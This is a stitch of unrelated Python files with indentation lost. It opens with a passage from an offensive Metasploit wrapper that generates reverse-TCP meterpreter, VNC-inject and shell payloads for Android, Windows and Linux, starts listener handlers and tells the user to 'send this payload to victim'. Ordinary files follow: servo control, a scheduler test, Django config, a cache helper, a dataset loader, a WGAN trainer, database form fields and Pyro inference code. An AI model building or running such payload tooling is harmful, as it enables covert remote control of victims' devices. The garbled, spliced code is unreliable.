if os.path.isfile(pth)==False:
if os.path.isfile('/usr/bin/msfconsole')==False:
print(R+"""
************************************************\n************************************************\n"""
+Y+"\nmsfconsole not found ! Please install Meatsploit-Framework properly and try again :( \n"+W)
p=input(CY+"Install Metasploit?"+G+" (y|n)"+R+" >>> "+W)
if p=="y":
install()
start()
mk()
check()
check2()
ch3()
main()
sel()
elif p=="n":
print(Y+"\nExit.........! Have a nice day :) ")
print(R+"\n------------"+CY+" Code by >>"+G+" Deadpool2000"+R+" ----------------------"+W)
exit(0)
else:
print(R+"\nInvalid choice ! Leaving.......\n"+W)
exit(0)
exit(0)
def cfile(lh,lp,ply):
f=open("msh.rc","w+")
l1="use exploit/multi/handler"
l2="set PAYLOAD "+str(ply)
l3="set LHOST "+str(lh)
l4="set LPORT "+str(lp)
l5="set ExitOnSession false"
l6="exploit -j -z"
f.write("%s\n%s\n%s\n%s\n%s\n%s\n" %(l1,l2,l3,l4,l5,l6))
f.close()
return
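# For illustration (example values only), cfile("192.168.1.5", 4444,
# "android/meterpreter/reverse_tcp") writes an msh.rc resource script like:
#
#     use exploit/multi/handler
#     set PAYLOAD android/meterpreter/reverse_tcp
#     set LHOST 192.168.1.5
#     set LPORT 4444
#     set ExitOnSession false
#     exploit -j -z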
def crplyd(lh,lp,ply,osname,ext):
print(B+"\nGenerating payload..........\n")
a=random.randint(1,99)
st1=str(osname)+str(a)+str(ext)
st="msfvenom -p "+str(ply)+" lhost="+str(lh)+" lport="+str(lp)+" R > payload/"+str(st1)
os.system(st)
print(R+"\n>>>"+G+" Payload saved as ("+Y+st1+G+") in 'payload' folder"+R+" <<<\n")
print(CY+"Now send this payload to victim. Then start 'handler' from main menu\n")
return
def table():
global ipd
global adr
tb=PrettyTable()
tb.field_names=["No.","Interface","Address"]
inte=os.listdir('/sys/class/net/')
i=j=k=0
adr=[]
for i in range(len(inte)):
cout=inte[i]
st="ifconfig "+str(cout)+" | grep 'inet ' | cut -c 13-26"
opt=os.popen(st)
ipd=opt.read()
cr=['n','e','t','m','a','s','k']
for l in cr:
ipd=ipd.replace(l,'')
ipd=ipd.strip()
adr.append(ipd)
tb.add_row([k,inte[i],adr[j]])
i+=1
j+=1
k+=1
print(Y+"\n>>> Select LHOST from list\n"+W)
print(tb)
try:
sc=int(input(G+"\nSelect your choice >>"+W+" "))
try:
ipd=adr[sc]
if ipd=="":
print(R+"\nNull address found!Select another address!")
table()
else:
print(CY+"\nSelected LHOST:"+W,ipd)
except IndexError:
print(R+"\nInvalid Choice! Please try again!")
table()
except ValueError:
print(R+"\nInvalid Choice! Please try again!")
table()
def sel():
try:
c=int(input(G+"Select your choice >>"+W+" "))
if c==1:
def sel1():
try:
ch=int(input(G+"Select your choice >>"+W+" "))
# Android
if ch==1:
lh=input(CY+"\nEnter LHOST:"+W+" ")
lp=int(input(CY+"Enter LPORT:"+W+" "))
ply="android/meterpreter/reverse_tcp"
osname="android_"
ext=".apk"
crplyd(lh,lp,ply,osname,ext)
osi()
sel1()
# Windows
elif ch==2:
try:
payld()
cc=int(input(G+"Select your choice >>"+W+" "))
if cc==1:
lh=input(CY+"\nEnter LHOST:"+W+" ")
lp=int(input(CY+"Enter LPORT:"+W+" "))
ply="windows/meterpreter/reverse_tcp"
osname="win_"
ext=".exe"
crplyd(lh,lp,ply,osname,ext)
elif cc==2:
lh=input(CY+"\nEnter LHOST:"+W+" ")
lp=int(input(CY+"Enter LPORT:"+W+" "))
ply="windows/x64/meterpreter/reverse_tcp"
osname="win_"
ext=".exe"
crplyd(lh,lp,ply,osname,ext)
elif cc==3:
lh=input(CY+"\nEnter LHOST:"+W+" ")
lp=int(input(CY+"Enter LPORT:"+W+" "))
ply="windows/vncinject/reverse_tcp"
osname="win_"
ext=".exe"
crplyd(lh,lp,ply,osname,ext)
elif cc==4:
lh=input(CY+"\nEnter LHOST:"+W+" ")
lp=int(input(CY+"Enter LPORT:"+W+" "))
ply="windows/x64/vncinject/reverse_tcp"
osname="win_"
ext=".exe"
crplyd(lh,lp,ply,osname,ext)
elif cc==5:
lh=input(CY+"\nEnter LHOST:"+W+" ")
lp=int(input(CY+"Enter LPORT:"+W+" "))
ply="windows/shell/reverse_tcp"
osname="win_"
ext=".exe"
crplyd(lh,lp,ply,osname,ext)
elif cc==6:
lh=input(CY+"\nEnter LHOST:"+W+" ")
lp=int(input(CY+"Enter LPORT:"+W+" "))
ply="windows/x64/shell/reverse_tcp"
osname="win_"
ext=".exe"
crplyd(lh,lp,ply,osname,ext)
elif cc==7:
lh=input(CY+"\nEnter LHOST:"+W+" ")
lp=int(input(CY+"Enter LPORT:"+W+" "))
ply="windows/powershell_reverse_tcp "
osname="win_"
ext=".exe"
crplyd(lh,lp,ply,osname,ext)
elif cc==8:
lh=input(CY+"\nEnter LHOST:"+W+" ")
lp=int(input(CY+"Enter LPORT:"+W+" "))
ply="windows/x64/powershell_reverse_tcp "
osname="win_"
ext=".exe"
crplyd(lh,lp,ply,osname,ext)
else:
print(R+"\nInvalid Choice! Please try again!")
osi()
sel1()
except ValueError:
print(R+"\nInvalid Choice! Please try again!")
osi()
sel1()
osi()
sel1()
# Linux
elif ch==3:
try:
linux_payload()
cc=int(input(G+"Select your choice >>"+W+" "))
if cc==1:
lh=input(CY+"\nEnter LHOST:"+W+" ")
lp=int(input(CY+"Enter LPORT:"+W+" "))
ply="linux/x86/meterpreter/reverse_tcp"
osname="linux_"
ext=".elf"
crplyd(lh,lp,ply,osname,ext)
elif cc==2:
lh=input(CY+"\nEnter LHOST:"+W+" ")
lp=int(input(CY+"Enter LPORT:"+W+" "))
ply="linux/x64/meterpreter/reverse_tcp"
osname="linux_"
ext=".elf"
crplyd(lh,lp,ply,osname,ext)
elif cc==3:
lh=input(CY+"\nEnter LHOST:"+W+" ")
lp=int(input(CY+"Enter LPORT:"+W+" "))
ply="linux/x86/shell/reverse_tcp"
osname="linux_"
ext=".elf"
crplyd(lh,lp,ply,osname,ext)
elif cc==4:
lh=input(CY+"\nEnter LHOST:"+W+" ")
lp=int(input(CY+"Enter LPORT:"+W+" "))
ply="linux/x64/shell/reverse_tcp"
osname="linux_"
ext=".elf"
crplyd(lh,lp,ply,osname,ext)
else:
print(R+"\nInvalid Choice! Please try again!")
osi()
sel1()
except ValueError:
print(R+"\nInvalid Choice! Please try again!")
osi()
sel1()
osi()
sel1()
elif ch==99:
os.system('clear')
start()
main()
sel()
else:
print(R+"\nInvalid Choice! Please try again\n")
osi()
sel1()
except ValueError:
print(R+"\nInvalid input ! Please try again !\n")
sel1()
osi()
sel1()
elif c==2:
def sel2():
try:
ch=int(input(G+"Select your choice >>"+W+" "))
if ch==1:
pr=os.path.isfile("msh.rc")
if pr:
check()
else:
table()
lh=ipd
lp=int(input(CY+"Enter LPORT:"+W+" "))
ply="android/meterpreter/reverse_tcp"
cfile(lh,lp,ply)
os.system('clear')
print(Y+"\nStarting handler...............\n"+W)
os.system("msfconsole -r msh.rc")
os.remove('msh.rc')
os.system("clear")
lst()
sel2()
elif ch==2:
try:
pr=os.path.isfile('msh.rc')
if pr:
check()
else:
payld()
ch=int(input(G+"Select your choice >>"+W+" "))
if ch==1:
table()
lh=ipd
lp=int(input(CY+"Enter LPORT:"+W+" "))
ply="windows/meterpreter/reverse_tcp"
cfile(lh,lp,ply)
elif ch==2:
table()
lh=ipd
lp=int(input(CY+"Enter LPORT:"+W+" "))
ply="windows/x64/meterpreter/reverse_tcp"
cfile(lh,lp,ply)
elif ch==3:
table()
lh=ipd
lp=int(input(CY+"Enter LPORT:"+W+" "))
ply="windows/vncinject/reverse_tcp"
cfile(lh,lp,ply)
elif ch==4:
table()
lh=ipd
lp=int(input(CY+"Enter LPORT:"+W+" "))
ply="windows/x64/vncinject/reverse_tcp"
cfile(lh,lp,ply)
elif ch==5:
table()
lh=ipd
lp=int(input(CY+"Enter LPORT:"+W+" "))
ply="windows/shell/reverse_tcp"
cfile(lh,lp,ply)
elif ch==6:
table()
lh=ipd
lp=int(input(CY+"Enter LPORT:"+W+" "))
ply="windows/x64/shell/reverse_tcp"
cfile(lh,lp,ply)
elif ch==7:
table()
lh=ipd
lp=int(input(CY+"Enter LPORT:"+W+" "))
ply="windows/powershell_reverse_tcp"
cfile(lh,lp,ply)
elif ch==8:
table()
lh=ipd
lp=int(input(CY+"Enter LPORT:"+W+" "))
ply="windows/x64/powershell_reverse_tcp"
cfile(lh,lp,ply)
else:
print(R+"\nInvalid choice! Please try again\n")
lst()
sel2()
os.system('clear')
print(Y+"\nStarting handler...............\n"+W)
os.system("msfconsole -r msh.rc")
os.remove('msh.rc')
os.system('clear')
lst()
sel2()
except ValueError:
print(R+"\nInvalid choice! Please try again\n")
lst()
sel2()
elif ch==3:
try:
pr=os.path.isfile('msh.rc')
if pr:
check()
else:
linux_payload()
ch=int(input(G+"Select your choice >>"+W+" "))
if ch==1:
table()
lh=ipd
lp=int(input(CY+"Enter LPORT:"+W+" "))
ply="linux/x86/meterpreter/reverse_tcp"
cfile(lh,lp,ply)
elif ch==2:
table()
lh=ipd
lp=int(input(CY+"Enter LPORT:"+W+" "))
ply="linux/x64/meterpreter/reverse_tcp"
cfile(lh,lp,ply)
elif ch==3:
table()
lh=ipd
lp=int(input(CY+"Enter LPORT:"+W+" "))
ply="linux/x86/shell/reverse_tcp"
cfile(lh,lp,ply)
elif ch==4:
table()
lh=ipd
lp=int(input(CY+"Enter LPORT:"+W+" "))
ply="linux/x64/shell/reverse_tcp"
cfile(lh,lp,ply)
else:
print(R+"\nInvalid choice! Please try again\n")
lst()
sel2()
os.system('clear')
print(Y+"\nStarting handler...............\n"+W)
os.system("msfconsole -r msh.rc")
os.remove('msh.rc')
os.system('clear')
lst()
sel2()
except ValueError:
print(R+"\nInvalid choice! Please try again\n")
lst()
sel2()
elif ch==99:
check()
os.system('clear')
start()
main()
sel()
else:
check()
print(R+"\nInvalid choice! Please try again\n")
lst()
sel2()
except ValueError:
print(R+"\nInvalid input ! Please try again !\n")
sel2()
lst()
sel2()
elif c==3:
os.system('clear')
print(Y+"\n>>> Launching msfconsole..................\n\n"+W)
os.system("msfconsole")
os.system('clear')
start()
main()
sel()
elif c==4:
check()
print(R+"************************************************")
print(Y+"\nExit.........! Have a nice day :) ")
print(R+"\n------------"+CY+" Code by >> "+G+" Deadpool2000"+R+" ----------------------"+W)
print(R+"------------"+CY+" Youtube >> "+G+" https://bit.ly/2HnPZd2"+R+" ------------\n"+W)
else:
check()
print(R+"\nInvalid choice ! Please try again :(\n")
main()
sel()
except ValueError:
print(R+"\nInvalid input ! Please try again!\n")
sel()
def ch3():
if os.path.isfile(pth)==True:
if os.path.isfile('/data/data/com.termux/files/usr/bin/msfvenom')==False:
print(R+"""
************************************************\n"""
+Y+"""\nmsfconsole and msfvenom not found in '/data/data/com.termux/files/usr/bin/'\n""")
p=input(CY+"Install Metasploit in Termux ?"+G+" (y|n)"+R+" >>> "+W)
if p=="y":
ver="6.1.15"
os.system("apt install -y ruby wget apr apr-util libiconv zlib autoconf bison clang coreutils curl findutils git libffi libgmp libpcap postgresql readline libsqlite openssl libtool libxml2 libxslt ncurses pkg-config make libgrpc termux-tools ncurses-utils ncurses tar termux-elf-cleaner unzip zip")
lk="wget -O msf.tar.gz https://github.com/rapid7/metasploit-framework/archive/"+ver+".tar.gz"
os.system(str(lk))
os.system("mv msf.tar.gz $HOME")
os.system("tar -xvf $HOME/msf.tar.gz && mv metasploit-framework-"+ver+" $HOME/metasploit-framework && rm $HOME/msf.tar.gz")
os.system("gem install --no-document --verbose rubygems-update && update_rubygems")
os.system("gem install bundler && bundle config build.nokogiri --use-system-libraries && cd $HOME/metasploit-framework && bundle install")
os.system("cp assets/termux/msfconsole $PREFIX/bin/ && cp assets/termux/msfvenom $PREFIX/bin/")
os.system("chmod +x $PREFIX/bin/msfconsole")
os.system("chmod +x $PREFIX/bin/msfvenom")
os.system('clear')
checkver()
start()
mk()
check()
check2()
ch3()
main()
sel()
elif p=="n":
print(Y+"\nExit.........! Have a nice day :) ")
print(R+"\n------------"+CY+" Code by >>"+G+" Deadpool2000"+R+" ----------------------"+W)
print(R+"------------"+CY+" Youtube >>"+G+" https://bit.ly/2HnPZd2"+R+" ------------\n"+W)
exit(0)
else:
print(R+"\nInvalid choice ! Leaving.......\n"+W)
exit(0)
checkver()
start()
mk()
check()
check2()
ch3()
main()
sel()
except KeyboardInterrupt:
check()
print(CY+"""\n
************************************************"""+G+
"\n\n>>> "+R+"Interrupted!"+Y+" Exiting.........\n"+W)
print(R+"\n------------"+CY+" Code by >> "+G+" Deadpool2000"+R+" ----------------------"+W)
print(R+"------------"+CY+" Youtube >> "+G+" https://bit.ly/2HnPZd2"+R+" ------------\n"+W)
|
# Taken from https://github.com/CCGSRobotics/CCGSRobotics-battlebots
from pyax12.connection import Connection
servo_connection = Connection(port="/dev/ttyACM0", baudrate=1000000)
servo_connection.flush()
# Consult the ROBOTIS e-Manual for more information on how
# the dynamixel servos interpret communications.
# === JOINT FUNCTIONS === #
# Set up a dynamixel so that it behaves like a joint.
def jointMode(ID):
servo_connection.set_cw_angle_limit(ID,0,False)
servo_connection.set_ccw_angle_limit(ID,1023,False)
# Move a dynamixel that has been set up as a joint.
def moveJoint(ID, position, speed):
servo_connection.goto(int(ID), int(position), int(speed), False)
# === WHEEL FUNCTIONS === #
# Set up a dynamixel so that it behaves like a wheel.
def wheelMode(ID):
servo_connection.set_ccw_angle_limit(ID,0,False)
servo_connection.set_cw_angle_limit(ID,0,False)
# Move a dynamixel that has been set up as a wheel.
def moveWheel(ID, speed):
# Negative speed moves CW, positive speed moves CCW
# Convert negative values of speed to between 1024 and 2047
speed = (speed) * 1023 / 100
if speed < 0:
# Limit allowed reverse speed to prevent errors
if speed < -1024:
speed = 2047
else:
speed = 1023 - speed
else:
if speed > 1023:
# Limit allowed forward speed to prevent errors
speed = 1023
servo_connection.flush()
servo_connection.goto(int(ID), 0, int(speed), degrees=False)
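# Usage sketch (assumes a powered dynamixel with ID 1 on the bus):
#
#     wheelMode(1)        # continuous-rotation mode
#     moveWheel(1, 50)    # spin CCW at roughly half speed
#     moveWheel(1, -50)   # spin CW at roughly half speed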
print('* functions defined *')
|
import pytest
import torch
import torch.nn as nn
from gyomei_trainer.modules.lr_scheduler import Scheduler
class NeuralNetwork(nn.Module):
def __init__(self):
super(NeuralNetwork, self).__init__()
self.flatten = nn.Flatten()
self.linear_relu_stack = nn.Sequential(
nn.Linear(28*28, 512),
nn.ReLU(),
nn.Linear(512, 512),
nn.ReLU(),
nn.Linear(512, 10),
)
def forward(self, x):
x = self.flatten(x)
logits = self.linear_relu_stack(x)
return logits
class TestScheduler:
@pytest.mark.parametrize(
'scheduler_name, created', [('linear', True), ('None', False),
('lambda', True), ('Lol', False)]
)
def test_scheduler(self, scheduler_name: str, created: bool):
"""Test learning rate scheduler.
AssertionError is raised in the case of a None scheduler, and
AttributeError is raised when the step() method is called on a
None scheduler.
Args:
scheduler_name (str): Name of the scheduler. There is a
linear and lambda one now.
created (bool): Should the scheduler be created.
Returns:
"""
model = NeuralNetwork()
optimizer = torch.optim.Adam(params=model.parameters())
scheduler = None
if scheduler_name == 'linear':
scheduler = torch.optim.lr_scheduler.LinearLR(optimizer)
elif scheduler_name == 'lambda':
scheduler = torch.optim.lr_scheduler.LambdaLR(
optimizer, lr_lambda=[lambda epoch: epoch // 30])
try:
lr_scheduler = Scheduler(scheduler)
optimizer.step()
lr_scheduler.scheduler.step()
assert created
except (AssertionError, AttributeError):
assert not created
|
# Generated by Django 2.2.10 on 2020-04-29 22:13
from django.db import migrations
class Migration(migrations.Migration):
dependencies = [
('youtube_saver', '0006_auto_20200430_0113'),
]
operations = [
migrations.DeleteModel(
name='YoutubeFormats',
),
]
|
from django.contrib import admin
from django.urls import path, include
from django.conf import settings
from django.conf.urls.static import static
from article import views
urlpatterns = [
path('admin/', admin.site.urls),
path('', views.index, name="index"),
path('about/', views.about, name="about"),
path('post/', include("article.urls")),
path('user/', include("user.urls")),
]
urlpatterns += static(settings.MEDIA_URL, document_root=settings.MEDIA_ROOT)
|
# -*- coding: UTF-8 -*-
from . import config
from . import log
log = log.Log(__name__)
def set(filename, content):
try:
file = open(config.cache_root_path + filename, 'w+', encoding='utf8')
file.write(content)
file.close()
except Exception as e:
log.error(str(e))
def get(filename):
try:
file = open(config.cache_root_path + filename, 'r', encoding='utf8')
content = file.read()
file.close()
return content
except Exception as e:
log.error(str(e))
return ''
def splice_filename(filename, params):
'''Build the full cache file name from the params dict.
Args:
filename: str, cache file name prefix.
params: dict, request params or other dict.
Returns:
str, full file name
'''
items = params.items()
for key,value in items:
if key == 'access_token':
continue
if value != '':
filename = filename + '_' + value
return filename
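# Example: splice_filename('articles', {'access_token': 'xyz', 'page': '2', 'tag': 'python'})
# returns 'articles_2_python' (access_token is skipped and empty values are ignored;
# the order follows the dict's iteration order).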
def set_params(filename, params, content):
'''Cache content under a file name derived from the params dict.
Args:
filename: str, cache file name prefix.
params: dict, request params or other dict.
content: str, cache content.
'''
if isinstance(content, bytes):
content = str(content, encoding='utf8')
return set(splice_filename(filename, params), content)
def get_params(filename, params):
'''Get cached content for a file name derived from the params dict.
Args:
filename: str, cache file name prefix.
params: dict, request params or other dict.
Returns:
str, cache content.
If the cache file can't be found, return ''.
'''
return get(splice_filename(filename, params))
|
from config import *
from scipy.io import loadmat
from keras.utils import np_utils
import pickle
def load(file_path=dataset_path):
"""
Load the dataset from a .mat file and save the class-to-ASCII mapping to a file.
:param
file_path: path to the .mat file (default value specified in config)
:return:
training and testing datasets and the number of classes
format: (train_data, train_labels), (test_data, test_labels), number_of_classes
"""
print("Loading dataset...")
# load dataset from file in matlab format
dataset_mat = loadmat(file_path)
# map classes (0 - 62) to ASCII codes for 0-9, A-Z, a-z
mapping = {char[0]: char[1] for char in dataset_mat['dataset'][0][0][2]}
# save mapping to a file
os.makedirs(os.path.dirname(mapping_path), exist_ok=True)
pickle.dump(mapping, open(mapping_path, 'wb'))
# load training data
# reshape flattened image to 2D array in matlab order (because of the format of the file)
train_images = dataset_mat['dataset'][0][0][0][0][0][0].reshape(-1, HEIGHT, WIDTH, 1, order='A')
train_labels = dataset_mat['dataset'][0][0][0][0][0][1]
# load testing data
# reshape flattened image to 2D array in matlab order (because of the format of the file)
test_images = dataset_mat['dataset'][0][0][1][0][0][0].reshape(-1, HEIGHT, WIDTH, 1, order='A')
test_labels = dataset_mat['dataset'][0][0][1][0][0][1]
# convert type to float32 (from int) and normalize (e.g. 255 to 1, 128 to 0.5, etc.)
train_images = train_images.astype('float32') / 255
test_images = test_images.astype('float32') / 255
# convert labels to one-hot (e.g. 5 to 0,0,0,0,0,1,0...)
classes = len(mapping) # number of classes
train_labels = np_utils.to_categorical(train_labels, classes)
test_labels = np_utils.to_categorical(test_labels, classes)
return (train_images, train_labels), (test_images, test_labels), classes
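# Typical usage (paths are taken from config):
#
#     (train_images, train_labels), (test_images, test_labels), classes = load()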
def load_mapping():
"""
load mapping of the dataset from file specified in config
:return:
the mapping of the dataset
"""
mapping = pickle.load(open(mapping_path, 'rb'))
return mapping
def get_classes(type=''):
"""
get list of classes based on selected type of chars
:param
type: type of characters (uppercase, lowercase, digit, blank for all classes)
:return:
list of classes
"""
# load mapping to convert chars to classes
mapping = load_mapping()
# result list
classes = []
# get keys from the mapping dictionary
keys = list(mapping.keys())
if type == 'digit':
# for each digit ASCII code add its class to the result
for i in range(48, 58):
# get the key by the value
classes.append(keys[list(mapping.values()).index(i)])
elif type == 'uppercase':
# for each uppercase ASCII code add its class to the result
for i in range(65, 91):
classes.append(keys[list(mapping.values()).index(i)])
elif type == 'lowercase':
# for each lowercase ASCII code add its class to the result
for i in range(97, 123):
classes.append(keys[list(mapping.values()).index(i)])
else:
# return all classes
classes = keys
return classes
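# Example: get_classes('digit') returns the ten class indices that map to ASCII
# codes 48-57 ('0'-'9'), while get_classes() with no argument returns every class.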
|
import torch
from torch import nn
from tqdm.notebook import tqdm
from criterion import WassersteinLoss, GradientPenalty
class Trainer():
def __init__(self, generator, critic, g_optimizer, c_optimizer, device='cuda:0'):
self.generator = generator.to(device)
self.critic = critic.to(device)
self.g_optimizer = g_optimizer
self.c_optimizer = c_optimizer
self.g_criterion=WassersteinLoss().to(device)
self.c_criterion=WassersteinLoss().to(device)
self.c_penalty=GradientPenalty().to(device)
def train(self, dataloader, epochs=500, N=64, repeat=5, display_step=10, device='cuda:0'):
self.alpha = torch.rand((64, 1, 1, 1, 1)).requires_grad_().to(device)
self.data={'gloss':[], 'closs':[], 'cfloss':[], 'crloss':[], 'cploss':[]}
for epoch in tqdm(range(epochs)):
e_gloss=0
e_cfloss=0
e_crloss=0
e_cploss=0
e_closs=0
for real in dataloader:
real = real.to(device)
# Train Critic
b_closs=0
b_cfloss=0
b_crloss=0
b_cploss=0
for _ in range(repeat):
cords = torch.randn(N, 32).to(device)
style = torch.randn(N, 32).to(device)
melody = torch.randn(N, 4, 32).to(device)
groove = torch.randn(N, 4, 32).to(device)
self.c_optimizer.zero_grad()
with torch.no_grad():
fake = self.generator(cords, style, melody, groove).detach()
realfake = self.alpha* real + (1. - self.alpha)* fake
fake_pred = self.critic(fake)
real_pred = self.critic(real)
realfake_pred = self.critic(realfake)
fake_loss = self.c_criterion(fake_pred, -torch.ones_like(fake_pred))
real_loss = self.c_criterion(real_pred, torch.ones_like(real_pred))
penalty = self.c_penalty(realfake, realfake_pred)
closs = fake_loss + real_loss + 10* penalty
closs.backward(retain_graph=True)
self.c_optimizer.step()
b_cfloss += fake_loss.item()/repeat
b_crloss += real_loss.item()/repeat
b_cploss += 10* penalty.item()/repeat
b_closs += closs.item()/repeat
e_cfloss += b_cfloss/len(dataloader)
e_crloss += b_crloss/len(dataloader)
e_cploss += b_cploss/len(dataloader)
e_closs += b_closs/len(dataloader)
# Train Generator
self.g_optimizer.zero_grad()
cords = torch.randn(N, 32).to(device)
style = torch.randn(N, 32).to(device)
melody = torch.randn(N, 4, 32).to(device)
groove = torch.randn(N, 4, 32).to(device)
fake = self.generator(cords, style, melody, groove)
fake_pred = self.critic(fake)
b_gloss = self.g_criterion(fake_pred, torch.ones_like(fake_pred))
b_gloss.backward()
self.g_optimizer.step()
e_gloss += b_gloss.item()/len(dataloader)
self.data['gloss'].append(e_gloss)
self.data['closs'].append(e_closs)
self.data['cfloss'].append(e_cfloss)
self.data['crloss'].append(e_crloss)
self.data['cploss'].append(e_cploss)
if epoch% display_step==0:
print(f'Epoch {epoch}/{epochs} | Generator loss: {e_gloss:.3f} | '\
+ f'Critic loss: {e_closs:.3f} (fake: {e_cfloss:.3f}, real: {e_crloss:.3f}, penalty: {e_cploss:.3f})')
|
"""
Contains fields used to select database models
"""
import logging
from . import basicfields
__author__ = 'Yu Lee Paul (Little Fish Solutions LTD)'
log = logging.getLogger(__name__)
class DbCodeSelectField(basicfields.SelectField):
"""
A select field that loads the database model by code
"""
def __init__(self, name, db_model, values=None, **kwargs):
if values is None:
# This will only work if the model has a name field
values = db_model.query.order_by(db_model.name).all()
self.valid_codes = None
else:
self.valid_codes = [v.code for v in values]
super(DbCodeSelectField, self).__init__(name, values, **kwargs)
# Save the database model so that we can query it later
self.db_model = db_model
def convert_value(self):
if self.value:
if self.valid_codes and self.value not in self.valid_codes:
self.error = 'Invalid selection'
else:
loaded_value = self.db_model.query.filter(self.db_model.code == self.value).first()
if loaded_value:
self.value = loaded_value
else:
self.error = 'Invalid value: %s' % self.value
self.value = None
class DbIdSelectField(basicfields.SelectField):
"""
A select field that loads the database model by id
"""
def __init__(self, name, db_model, values=None, **kwargs):
if values is None:
# This will only work if the model has a name field
values = db_model.query.order_by(db_model.name).all()
self.valid_ids = None
else:
self.valid_ids = [v.id for v in values]
super(DbIdSelectField, self).__init__(name, values, **kwargs)
# Save the database model so that we can query it later
self.db_model = db_model
def convert_value(self):
if self.value:
int_value = None
try:
int_value = int(self.value)
except ValueError:
pass
if int_value is None:
self.error = 'Invalid'
if not self.error and self.valid_ids and int_value not in self.valid_ids:
self.error = 'Invalid selection'
if not self.error:
loaded_value = self.db_model.query.filter(self.db_model.id == self.value).first()
if loaded_value:
self.value = loaded_value
else:
self.error = 'Invalid value: %s' % self.value
self.value = None
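# Illustrative usage only (Country is a hypothetical model with `id` and `name`
# columns); in a real form the framework would populate `value` before conversion:
#
#     field = DbIdSelectField('country', Country)
#     field.value = '3'
#     field.convert_value()  # value becomes the Country with id 3, or error is set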
|
from __future__ import absolute_import, division, print_function
import warnings
from collections import namedtuple
import networkx
import numpy as np
import torch
import pyro
import pyro.poutine as poutine
from pyro.infer.util import torch_backward, torch_data_sum
from pyro.poutine.util import prune_subsample_sites
from pyro.util import check_model_guide_match, detach_iterable, ng_zeros
CostNode = namedtuple("CostNode", ["cost", "nonzero_expectation"])
def _get_baseline_options(site):
"""
Extracts baseline options from ``site["baseline"]``.
"""
# XXX default for baseline_beta currently set here
options_dict = site["baseline"].copy()
options_tuple = (options_dict.pop('nn_baseline', None),
options_dict.pop('nn_baseline_input', None),
options_dict.pop('use_decaying_avg_baseline', False),
options_dict.pop('baseline_beta', 0.90),
options_dict.pop('baseline_value', None))
if options_dict:
raise ValueError("Unrecognized baseline options: {}".format(options_dict.keys()))
return options_tuple
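# For example, a site whose baseline dict is
# {'use_decaying_avg_baseline': True, 'baseline_beta': 0.95} unpacks to
# (None, None, True, 0.95, None); any unrecognized key raises ValueError.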
def _compute_downstream_costs(model_trace, guide_trace, #
model_vec_md_nodes, guide_vec_md_nodes, #
non_reparam_nodes):
# recursively compute downstream cost nodes for all sample sites in model and guide
# (even though ultimately just need for non-reparameterizable sample sites)
# 1. downstream costs used for rao-blackwellization
# 2. model observe sites (as well as terms that arise from the model and guide having different
# dependency structures) are taken care of via 'children_in_model' below
topo_sort_guide_nodes = list(reversed(list(networkx.topological_sort(guide_trace))))
topo_sort_guide_nodes = [x for x in topo_sort_guide_nodes
if guide_trace.nodes[x]["type"] == "sample"]
downstream_guide_cost_nodes = {}
downstream_costs = {}
for node in topo_sort_guide_nodes:
node_log_pdf_key = 'batch_log_pdf' if node in guide_vec_md_nodes else 'log_pdf'
downstream_costs[node] = model_trace.nodes[node][node_log_pdf_key] - \
guide_trace.nodes[node][node_log_pdf_key]
nodes_included_in_sum = set([node])
downstream_guide_cost_nodes[node] = set([node])
for child in guide_trace.successors(node):
child_cost_nodes = downstream_guide_cost_nodes[child]
downstream_guide_cost_nodes[node].update(child_cost_nodes)
if nodes_included_in_sum.isdisjoint(child_cost_nodes): # avoid duplicates
if node_log_pdf_key == 'log_pdf':
downstream_costs[node] += downstream_costs[child].sum()
else:
downstream_costs[node] += downstream_costs[child]
nodes_included_in_sum.update(child_cost_nodes)
missing_downstream_costs = downstream_guide_cost_nodes[node] - nodes_included_in_sum
# include terms we missed because we had to avoid duplicates
for missing_node in missing_downstream_costs:
mn_log_pdf_key = 'batch_log_pdf' if missing_node in guide_vec_md_nodes else 'log_pdf'
if node_log_pdf_key == 'log_pdf':
downstream_costs[node] += (model_trace.nodes[missing_node][mn_log_pdf_key] -
guide_trace.nodes[missing_node][mn_log_pdf_key]).sum()
else:
downstream_costs[node] += model_trace.nodes[missing_node][mn_log_pdf_key] - \
guide_trace.nodes[missing_node][mn_log_pdf_key]
# finish assembling complete downstream costs
# (the above computation may be missing terms from model)
# XXX can we cache some of the sums over children_in_model to make things more efficient?
for site in non_reparam_nodes:
children_in_model = set()
for node in downstream_guide_cost_nodes[site]:
children_in_model.update(model_trace.successors(node))
# remove terms accounted for above
children_in_model.difference_update(downstream_guide_cost_nodes[site])
for child in children_in_model:
child_log_pdf_key = 'batch_log_pdf' if child in model_vec_md_nodes else 'log_pdf'
site_log_pdf_key = 'batch_log_pdf' if site in guide_vec_md_nodes else 'log_pdf'
assert (model_trace.nodes[child]["type"] == "sample")
if site_log_pdf_key == 'log_pdf':
downstream_costs[site] += model_trace.nodes[child][child_log_pdf_key].sum()
else:
downstream_costs[site] += model_trace.nodes[child][child_log_pdf_key]
return downstream_costs
def _compute_elbo_reparam(model_trace, guide_trace, non_reparam_nodes):
# prepare a list of all the cost nodes, each of which is +- log_pdf
cost_nodes = []
for name, model_site in model_trace.nodes.items():
if model_site["type"] == "sample":
if model_site["is_observed"]:
cost_nodes.append(CostNode(model_site["log_pdf"], True))
else:
# cost node from model sample
cost_nodes.append(CostNode(model_site["log_pdf"], True))
# cost node from guide sample
guide_site = guide_trace.nodes[name]
zero_expectation = name in non_reparam_nodes
cost_nodes.append(CostNode(-guide_site["log_pdf"], not zero_expectation))
# compute the elbo; if all stochastic nodes are reparameterizable, we're done
# this bit is never differentiated: it's here for getting an estimate of the elbo itself
elbo = torch_data_sum(sum(c.cost for c in cost_nodes))
# compute the surrogate elbo, removing terms whose gradient is zero
# this is the bit that's actually differentiated
# XXX should the user be able to control if these terms are included?
surrogate_elbo = sum(c.cost for c in cost_nodes if c.nonzero_expectation)
return elbo, surrogate_elbo
def _compute_elbo_non_reparam(guide_trace, guide_vec_md_nodes, #
non_reparam_nodes, downstream_costs):
# construct all the reinforce-like terms.
# we include only downstream costs to reduce variance
# optionally include baselines to further reduce variance
# XXX should the average baseline be in the param store as below?
surrogate_elbo = 0.0
baseline_loss = 0.0
for node in non_reparam_nodes:
guide_site = guide_trace.nodes[node]
log_pdf_key = 'batch_log_pdf' if node in guide_vec_md_nodes else 'log_pdf'
downstream_cost = downstream_costs[node]
baseline = 0.0
(nn_baseline, nn_baseline_input, use_decaying_avg_baseline, baseline_beta,
baseline_value) = _get_baseline_options(guide_site)
use_nn_baseline = nn_baseline is not None
use_baseline_value = baseline_value is not None
assert(not (use_nn_baseline and use_baseline_value)), \
"cannot use baseline_value and nn_baseline simultaneously"
